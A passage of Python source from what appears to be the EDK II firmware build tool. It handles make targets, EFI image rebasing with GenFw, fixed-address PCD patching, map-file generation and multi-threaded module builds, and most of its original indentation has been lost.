for Mod in AutoGenObject.ModuleBuildDirectoryList:
ModMakefile = os.path.normpath(os.path.join(Mod, makefile))
if os.path.exists(ModMakefile):
NewBuildCommand = BuildCommand + ['-f', ModMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, makefile))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# cleanall
if Target == 'cleanall':
try:
RemoveDirectory(AutoGenObject.BuildDir, True)
            except OSError as X:
EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
return True
## Build a module or platform
#
    # Create AutoGen code and makefile for a module or platform, and then launch
    # the "make" command to build it
    #
    #   @param  Target                      The target of build command
    #   @param  AutoGenObject               The platform or module AutoGen object
    #   @param  CreateDepsCodeFile          Flag used to indicate creating code
    #                                       for dependent modules/Libraries
    #   @param  CreateDepsMakeFile          Flag used to indicate creating makefile
    #                                       for dependent modules/Libraries
    #   @param  BuildModule                 Flag used to indicate building a module instead of a platform
#
def _Build(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False):
if AutoGenObject is None:
return False
        # skip file generation for the cleanxxx, run and fds targets
        if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
            # for targets that must generate AutoGen code and makefile
if not self.SkipAutoGen or Target == 'genc':
self.Progress.Start("Generating code")
AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
self.Progress.Stop("done!")
if Target == "genc":
return True
if not self.SkipAutoGen or Target == 'genmake':
self.Progress.Start("Generating makefile")
AutoGenObject.CreateMakeFile(CreateDepsMakeFile)
self.Progress.Stop("done!")
if Target == "genmake":
return True
else:
# always recreate top/platform makefile when clean, just in case of inconsistency
AutoGenObject.CreateCodeFile(False)
AutoGenObject.CreateMakeFile(False)
if EdkLogger.GetLevel() == EdkLogger.QUIET:
EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
BuildCommand = AutoGenObject.BuildCommand
if BuildCommand is None or len(BuildCommand) == 0:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
ExtraData=str(AutoGenObject))
# build modules
if BuildModule:
if Target != 'fds':
BuildCommand = BuildCommand + [Target]
AutoGenObject.BuildTime = LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# genfds
if Target == 'fds':
if GenFdsApi(AutoGenObject.GenFdsCommandDict, self.Db):
EdkLogger.error("build", COMMAND_FAILURE)
return True
# run
if Target == 'run':
RunDir = os.path.normpath(os.path.join(AutoGenObject.BuildDir, GlobalData.gGlobalDefines['ARCH']))
            Command = '.\\SecMain'
os.chdir(RunDir)
LaunchCommand(Command, RunDir)
return True
# build library
if Target == 'libraries':
pass
# not build modules
# cleanall
if Target == 'cleanall':
try:
RemoveDirectory(AutoGenObject.BuildDir, True)
            except OSError as X:
EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
return True
    ## Rebase module images and get function addresses for the input module list.
#
def _RebaseModule (self, MapBuffer, BaseAddress, ModuleList, AddrIsOffset = True, ModeIsSmm = False):
if ModeIsSmm:
AddrIsOffset = False
for InfFile in ModuleList:
sys.stdout.write (".")
sys.stdout.flush()
ModuleInfo = ModuleList[InfFile]
ModuleName = ModuleInfo.BaseName
ModuleOutputImage = ModuleInfo.Image.FileName
ModuleDebugImage = os.path.join(ModuleInfo.DebugDir, ModuleInfo.BaseName + '.efi')
            # For SMM modules in SMRAM, SMRAM is allocated from base to top; other images are allocated top-down.
if not ModeIsSmm:
BaseAddress = BaseAddress - ModuleInfo.Image.Size
#
# Update Image to new BaseAddress by GenFw tool
#
LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
else:
#
# Set new address to the section header only for SMM driver.
#
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
#
# Collect function address from Map file
#
ImageMapTable = ModuleOutputImage.replace('.efi', '.map')
FunctionList = []
if os.path.exists(ImageMapTable):
OrigImageBaseAddress = 0
ImageMap = open(ImageMapTable, 'r')
for LinStr in ImageMap:
if len (LinStr.strip()) == 0:
continue
#
                    # Get the preferred address set at link time.
#
if LinStr.find ('Preferred load address is') != -1:
StrList = LinStr.split()
OrigImageBaseAddress = int (StrList[len(StrList) - 1], 16)
StrList = LinStr.split()
if len (StrList) > 4:
if StrList[3] == 'f' or StrList[3] == 'F':
Name = StrList[1]
RelativeAddress = int (StrList[2], 16) - OrigImageBaseAddress
FunctionList.append ((Name, RelativeAddress))
ImageMap.close()
#
# Add general information.
#
if ModeIsSmm:
MapBuffer.append('\n\n%s (Fixed SMRAM Offset, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
elif AddrIsOffset:
MapBuffer.append('\n\n%s (Fixed Memory Offset, BaseAddress=-0x%010X, EntryPoint=-0x%010X)\n' % (ModuleName, 0 - BaseAddress, 0 - (BaseAddress + ModuleInfo.Image.EntryPoint)))
else:
MapBuffer.append('\n\n%s (Fixed Memory Address, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
#
            # Add GUID and general section information.
#
TextSectionAddress = 0
DataSectionAddress = 0
for SectionHeader in ModuleInfo.Image.SectionHeaderList:
if SectionHeader[0] == '.text':
TextSectionAddress = SectionHeader[1]
elif SectionHeader[0] in ['.data', '.sdata']:
DataSectionAddress = SectionHeader[1]
if AddrIsOffset:
MapBuffer.append('(GUID=%s, .textbaseaddress=-0x%010X, .databaseaddress=-0x%010X)\n' % (ModuleInfo.Guid, 0 - (BaseAddress + TextSectionAddress), 0 - (BaseAddress + DataSectionAddress)))
else:
MapBuffer.append('(GUID=%s, .textbaseaddress=0x%010X, .databaseaddress=0x%010X)\n' % (ModuleInfo.Guid, BaseAddress + TextSectionAddress, BaseAddress + DataSectionAddress))
#
# Add debug image full path.
#
MapBuffer.append('(IMAGE=%s)\n\n' % (ModuleDebugImage))
#
# Add function address
#
for Function in FunctionList:
if AddrIsOffset:
MapBuffer.append(' -0x%010X %s\n' % (0 - (BaseAddress + Function[1]), Function[0]))
else:
MapBuffer.append(' 0x%010X %s\n' % (BaseAddress + Function[1], Function[0]))
#
# for SMM module in SMRAM, the SMRAM will be allocated from base to top.
#
if ModeIsSmm:
BaseAddress = BaseAddress + ModuleInfo.Image.Size
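    # Note on allocation direction (summarizing the loop above): non-SMM modules
    # are laid out top-down, so BaseAddress is decremented by the image size
    # before each rebase; SMM modules are laid out bottom-up inside SMRAM, so
    # BaseAddress is incremented after each rebase. When AddrIsOffset is True,
    # the map records negative offsets from the top of memory.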
## Collect MAP information of all FVs
#
def _CollectFvMapBuffer (self, MapBuffer, Wa, ModuleList):
if self.Fdf:
# First get the XIP base address for FV map file.
            GuidPattern = re.compile(r"[-a-fA-F0-9]+")
            GuidName = re.compile(r"\(GUID=[-a-fA-F0-9]+")
for FvName in Wa.FdfProfile.FvDict:
FvMapBuffer = os.path.join(Wa.FvDir, FvName + '.Fv.map')
if not os.path.exists(FvMapBuffer):
continue
FvMap = open(FvMapBuffer, 'r')
                # skip the FV size information (first four lines)
FvMap.readline()
FvMap.readline()
FvMap.readline()
FvMap.readline()
for Line in FvMap:
MatchGuid = GuidPattern.match(Line)
if MatchGuid is not None:
#
# Replace GUID with module name
#
GuidString = MatchGuid.group()
if GuidString.upper() in ModuleList:
Line = Line.replace(GuidString, ModuleList[GuidString.upper()].Name)
MapBuffer.append(Line)
#
# Add the debug image full path.
#
MatchGuid = GuidName.match(Line)
if MatchGuid is not None:
GuidString = MatchGuid.group().split("=")[1]
if GuidString.upper() in ModuleList:
MapBuffer.append('(IMAGE=%s)\n' % (os.path.join(ModuleList[GuidString.upper()].DebugDir, ModuleList[GuidString.upper()].Name + '.efi')))
FvMap.close()
## Collect MAP information of all modules
#
def _CollectModuleMapBuffer (self, MapBuffer, ModuleList):
sys.stdout.write ("Generate Load Module At Fix Address Map")
sys.stdout.flush()
PatchEfiImageList = []
PeiModuleList = {}
BtModuleList = {}
RtModuleList = {}
SmmModuleList = {}
PeiSize = 0
BtSize = 0
RtSize = 0
        # reserve 4K in SMRAM so that SMM module addresses do not start at 0.
SmmSize = 0x1000
for ModuleGuid in ModuleList:
Module = ModuleList[ModuleGuid]
GlobalData.gProcessingFile = "%s [%s, %s, %s]" % (Module.MetaFile, Module.Arch, Module.ToolChain, Module.BuildTarget)
OutputImageFile = ''
for ResultFile in Module.CodaTargetList:
if str(ResultFile.Target).endswith('.efi'):
#
# module list for PEI, DXE, RUNTIME and SMM
#
OutputImageFile = os.path.join(Module.OutputDir, Module.Name + '.efi')
ImageClass = PeImageClass (OutputImageFile)
if not ImageClass.IsValid:
EdkLogger.error("build", FILE_PARSE_FAILURE, ExtraData=ImageClass.ErrorInfo)
ImageInfo = PeImageInfo(Module.Name, Module.Guid, Module.Arch, Module.OutputDir, Module.DebugDir, ImageClass)
if Module.ModuleType in [SUP_MODULE_PEI_CORE, SUP_MODULE_PEIM, EDK_COMPONENT_TYPE_COMBINED_PEIM_DRIVER, EDK_COMPONENT_TYPE_PIC_PEIM, EDK_COMPONENT_TYPE_RELOCATABLE_PEIM, SUP_MODULE_DXE_CORE]:
PeiModuleList[Module.MetaFile] = ImageInfo
PeiSize += ImageInfo.Image.Size
elif Module.ModuleType in [EDK_COMPONENT_TYPE_BS_DRIVER, SUP_MODULE_DXE_DRIVER, SUP_MODULE_UEFI_DRIVER]:
BtModuleList[Module.MetaFile] = ImageInfo
BtSize += ImageInfo.Image.Size
elif Module.ModuleType in [SUP_MODULE_DXE_RUNTIME_DRIVER, EDK_COMPONENT_TYPE_RT_DRIVER, SUP_MODULE_DXE_SAL_DRIVER, EDK_COMPONENT_TYPE_SAL_RT_DRIVER]:
RtModuleList[Module.MetaFile] = ImageInfo
RtSize += ImageInfo.Image.Size
elif Module.ModuleType in [SUP_MODULE_SMM_CORE, SUP_MODULE_DXE_SMM_DRIVER, SUP_MODULE_MM_STANDALONE, SUP_MODULE_MM_CORE_STANDALONE]:
SmmModuleList[Module.MetaFile] = ImageInfo
SmmSize += ImageInfo.Image.Size
if Module.ModuleType == SUP_MODULE_DXE_SMM_DRIVER:
PiSpecVersion = Module.Module.Specification.get('PI_SPECIFICATION_VERSION', '0x00000000')
# for PI specification < PI1.1, DXE_SMM_DRIVER also runs as BOOT time driver.
if int(PiSpecVersion, 16) < 0x0001000A:
BtModuleList[Module.MetaFile] = ImageInfo
BtSize += ImageInfo.Image.Size
break
#
            # The EFI image is the final target.
            # Check whether the EFI image contains patchable FixAddress-related PCDs.
#
if OutputImageFile != '':
ModuleIsPatch = False
for Pcd in Module.ModulePcdList:
if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SET:
ModuleIsPatch = True
break
if not ModuleIsPatch:
for Pcd in Module.LibraryPcdList:
if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SET:
ModuleIsPatch = True
break
if not ModuleIsPatch:
continue
#
# Module includes the patchable load fix address PCDs.
# It will be fixed up later.
#
PatchEfiImageList.append (OutputImageFile)
#
# Get Top Memory address
#
ReservedRuntimeMemorySize = 0
TopMemoryAddress = 0
if self.LoadFixAddress == 0xFFFFFFFFFFFFFFFF:
TopMemoryAddress = 0
else:
TopMemoryAddress = self.LoadFixAddress
if TopMemoryAddress < RtSize + BtSize + PeiSize:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS is too low to load driver")
#
# Patch FixAddress related PCDs into EFI image
#
for EfiImage in PatchEfiImageList:
EfiImageMap = EfiImage.replace('.efi', '.map')
if not os.path.exists(EfiImageMap):
continue
#
# Get PCD offset in EFI image by GenPatchPcdTable function
#
PcdTable = parsePcdInfoFromMapFile(EfiImageMap, EfiImage)
#
# Patch real PCD value by PatchPcdValue tool
#
for PcdInfo in PcdTable:
ReturnValue = 0
if PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE_DATA_TYPE, str (PeiSize // 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE_DATA_TYPE, str (BtSize // 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE_DATA_TYPE, str (RtSize // 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE and len (SmmModuleList) > 0:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE_DATA_TYPE, str (SmmSize // 0x1000))
if ReturnValue != 0:
EdkLogger.error("build", PARAMETER_INVALID, "Patch PCD value failed", ExtraData=ErrorInfo)
MapBuffer.append('PEI_CODE_PAGE_NUMBER = 0x%x\n' % (PeiSize // 0x1000))
MapBuffer.append('BOOT_CODE_PAGE_NUMBER = 0x%x\n' % (BtSize // 0x1000))
MapBuffer.append('RUNTIME_CODE_PAGE_NUMBER = 0x%x\n' % (RtSize // 0x1000))
if len (SmmModuleList) > 0:
MapBuffer.append('SMM_CODE_PAGE_NUMBER = 0x%x\n' % (SmmSize // 0x1000))
PeiBaseAddr = TopMemoryAddress - RtSize - BtSize
BtBaseAddr = TopMemoryAddress - RtSize
RtBaseAddr = TopMemoryAddress - ReservedRuntimeMemorySize
self._RebaseModule (MapBuffer, PeiBaseAddr, PeiModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, BtBaseAddr, BtModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, RtBaseAddr, RtModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, 0x1000, SmmModuleList, AddrIsOffset=False, ModeIsSmm=True)
MapBuffer.append('\n\n')
sys.stdout.write ("\n")
sys.stdout.flush()
## Save platform Map file
#
def _SaveMapFile (self, MapBuffer, Wa):
#
        # Compose the platform map file path.
#
MapFilePath = os.path.join(Wa.BuildDir, Wa.Name + '.map')
#
# Save address map into MAP file.
#
SaveFileOnChange(MapFilePath, ''.join(MapBuffer), False)
if self.LoadFixAddress != 0:
sys.stdout.write ("\nLoad Module At Fix Address Map file can be found at %s\n" % (MapFilePath))
sys.stdout.flush()
## Build active platform for different build targets and different tool chains
#
def _BuildPlatform(self):
SaveFileOnChange(self.PlatformBuildPath, '# DO NOT EDIT \n# FILE auto-generated\n', False)
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
self.BuildReport.AddPlatformReport(Wa)
self.Progress.Stop("done!")
# Add ffs build to makefile
CmdListDict = {}
if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
CmdListDict = self._GenFfsCmd(Wa.ArchList)
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
for Module in Pa.Platform.Modules:
# Get ModuleAutoGen object to generate C code file and makefile
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma is None:
continue
self.BuildModules.append(Ma)
self._BuildPa(self.Target, Pa, FfsCommand=CmdListDict)
# Create MAP file when Load Fix Address is enabled.
if self.Target in ["", "all", "fds"]:
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platform with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma is None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
MapBuffer = []
if self.LoadFixAddress != 0:
#
# Rebase module to the preferred memory address before GenFds
#
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
if self.Fdf:
#
# create FDS again for the updated EFI image
#
self._Build("fds", Wa)
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile (MapBuffer, Wa)
## Build active module for different build targets, different tool chains and different archs
#
def _BuildModule(self):
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
WorkspaceAutoGenTime = time.time()
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
#
# module build needs platform build information, so get platform
# AutoGen first
#
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress,
self.ModuleFile
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
Wa.CreateMakeFile(False)
# Add ffs build to makefile
CmdListDict = None
if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
CmdListDict = self._GenFfsCmd(Wa.ArchList)
self.Progress.Stop("done!")
MaList = []
ExitFlag = threading.Event()
ExitFlag.clear()
self.AutoGenTime += int(round((time.time() - WorkspaceAutoGenTime)))
for Arch in Wa.ArchList:
AutoGenStart = time.time()
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
for Module in Pa.Platform.Modules:
if self.ModuleFile.Dir == Module.Dir and self.ModuleFile.Name == Module.Name:
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma is None:
continue
MaList.append(Ma)
if Ma.CanSkipbyHash():
self.HashSkipModules.append(Ma)
continue
                            # Do not auto-gen for the 'clean', 'cleanlib', 'cleanall', 'run' and 'fds' targets
                            if self.Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
                                # for targets that must generate AutoGen code and makefile
if not self.SkipAutoGen or self.Target == 'genc':
self.Progress.Start("Generating code")
Ma.CreateCodeFile(True)
self.Progress.Stop("done!")
if self.Target == "genc":
return True
if not self.SkipAutoGen or self.Target == 'genmake':
self.Progress.Start("Generating makefile")
if CmdListDict and self.Fdf and (Module.File, Arch) in CmdListDict:
Ma.CreateMakeFile(True, CmdListDict[Module.File, Arch])
del CmdListDict[Module.File, Arch]
else:
Ma.CreateMakeFile(True)
self.Progress.Stop("done!")
if self.Target == "genmake":
return True
self.BuildModules.append(Ma)
# Initialize all modules in tracking to False (FAIL)
if Ma not in GlobalData.gModuleBuildTracking:
GlobalData.gModuleBuildTracking[Ma] = False
self.AutoGenTime += int(round((time.time() - AutoGenStart)))
MakeStart = time.time()
for Ma in self.BuildModules:
if not Ma.IsBinaryModule:
Bt = BuildTask.New(ModuleMakeUnit(Ma, self.Target))
# Break build if any build thread has error
if BuildTask.HasError():
# we need a full version of makefile for platform
ExitFlag.set()
BuildTask.WaitForComplete()
self.invalidateHash()
Pa.CreateMakeFile(False)
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Start task scheduler
if not BuildTask.IsOnGoing():
BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)
                    # In case of an interruption, we need a full version of the platform makefile
Pa.CreateMakeFile(False)
if BuildTask.HasError():
self.invalidateHash()
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
self.MakeTime += int(round((time.time() - MakeStart)))
                MakeContinue = time.time()
ExitFlag.set()
BuildTask.WaitForComplete()
self.CreateAsBuiltInf()
                self.MakeTime += int(round((time.time() - MakeContinue)))
if BuildTask.HasError():
self.invalidateHash()
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
self.BuildReport.AddPlatformReport(Wa, MaList)
if MaList == []:
EdkLogger.error(
'build',
BUILD_ERROR,
"Module for [%s] is not a component of active platform."\
" Please make sure that the ARCH and inf file path are"\
" given in the same as in [%s]" % \
(', '.join(Wa.ArchList), self.PlatformFile),
ExtraData=self.ModuleFile
)
# Create MAP file when Load Fix Address is enabled.
if self.Target == "fds" and self.Fdf:
for Arch in Wa.ArchList:
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma is None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
MapBuffer = []
if self.LoadFixAddress != 0:
#
# Rebase module to the preferred memory address before GenFds
#
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
#
# create FDS again for the updated EFI image
#
GenFdsStart = time.time()
self._Build("fds", Wa)
self.GenFdsTime += int(round((time.time() - GenFdsStart)))
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile (MapBuffer, Wa)
def _GenFfsCmd(self,ArchList):
        # Convert a dictionary of Cmd:(Inf, Arch) pairs into a dictionary of
        # (Inf, Arch):{Cmd, ...} sets
CmdSetDict = defaultdict(set)
GenFfsDict = GenFds.GenFfsMakefile('', GlobalData.gFdfParser, self, ArchList, GlobalData)
for Cmd in GenFfsDict:
tmpInf, tmpArch = GenFfsDict[Cmd]
CmdSetDict[tmpInf, tmpArch].add(Cmd)
return CmdSetDict
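    # Illustrative inversion (hypothetical values): given
    #   GenFfsDict = {'cmd1': (InfA, 'X64'), 'cmd2': (InfA, 'X64'),
    #                 'cmd3': (InfB, 'IA32')}
    # the returned CmdSetDict is
    #   {(InfA, 'X64'): {'cmd1', 'cmd2'}, (InfB, 'IA32'): {'cmd3'}}
    # so each (INF, arch) pair carries the full set of FFS commands for its
    # makefile.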
## Build a platform in multi-thread mode
#
def _MultiThreadBuildPlatform(self):
SaveFileOnChange(self.PlatformBuildPath, '# DO NOT EDIT \n# FILE auto-generated\n', False)
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
WorkspaceAutoGenTime = time.time()
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
self.BuildReport.AddPlatformReport(Wa)
Wa.CreateMakeFile(False)
# Add ffs build to makefile
CmdListDict = None
if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
CmdListDict = self._GenFfsCmd(Wa.ArchList)
# multi-thread exit flag
ExitFlag = threading.Event()
ExitFlag.clear()
self.AutoGenTime += int(round((time.time() - WorkspaceAutoGenTime)))
for Arch in Wa.ArchList:
AutoGenStart = time.time()
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
if Pa is None:
continue
ModuleList = []
for Inf in Pa.Platform.Modules:
ModuleList.append(Inf)
                    # Add INF files that are listed only in the FDF
if GlobalData.gFdfParser is not None:
for InfName in GlobalData.gFdfParser.Profile.InfList:
Inf = PathClass(NormPath(InfName), self.WorkspaceDir, Arch)
if Inf in Pa.Platform.Modules:
continue
ModuleList.append(Inf)
for Module in ModuleList:
# Get ModuleAutoGen object to generate C code file and makefile
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma is None:
continue
if Ma.CanSkipbyHash():
self.HashSkipModules.append(Ma)
continue
                        # Do not auto-gen for the 'clean', 'cleanlib', 'cleanall', 'run' and 'fds' targets
                        if self.Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
                            # for targets that must generate AutoGen code and makefile
if not self.SkipAutoGen or self.Target == 'genc':
Ma.CreateCodeFile(True)
if self.Target == "genc":
continue
if not self.SkipAutoGen or self.Target == 'genmake':
if CmdListDict and self.Fdf and (Module.File, Arch) in CmdListDict:
Ma.CreateMakeFile(True, CmdListDict[Module.File, Arch])
del CmdListDict[Module.File, Arch]
else:
Ma.CreateMakeFile(True)
if self.Target == "genmake":
continue
self.BuildModules.append(Ma)
# Initialize all modules in tracking to False (FAIL)
if Ma not in GlobalData.gModuleBuildTracking:
GlobalData.gModuleBuildTracking[Ma] = False
self.Progress.Stop("done!")
self.AutoGenTime += int(round((time.time() - AutoGenStart)))
MakeStart = time.time()
for Ma in self.BuildModules:
# Generate build task for the module
if not Ma.IsBinaryModule:
Bt = BuildTask.New(ModuleMakeUnit(Ma, self.Target))
# Break build if any build thread has error
if BuildTask.HasError():
# we need a full version of makefile for platform
ExitFlag.set()
BuildTask.WaitForComplete()
self.invalidateHash()
Pa.CreateMakeFile(False)
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Start task scheduler
if not BuildTask.IsOnGoing():
BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)
                    # In case of an interruption, we need a full version of the platform makefile
Pa.CreateMakeFile(False)
if BuildTask.HasError():
self.invalidateHash()
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
self.MakeTime += int(round((time.time() - MakeStart)))
                MakeContinue = time.time()
                #
                # All modules have been put in the build task queue. Tell the task
                # scheduler to exit when all tasks are completed.
                #
ExitFlag.set()
BuildTask.WaitForComplete()
self.CreateAsBuiltInf()
                self.MakeTime += int(round((time.time() - MakeContinue)))
#
# Check for build error, and raise exception if one
# has been signaled.
#
if BuildTask.HasError():
self.invalidateHash()
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Create MAP file when Load Fix Address is enabled.
if self.Target in ["", "all", "fds"]:
for Arch in Wa.ArchList:
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma is None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
#
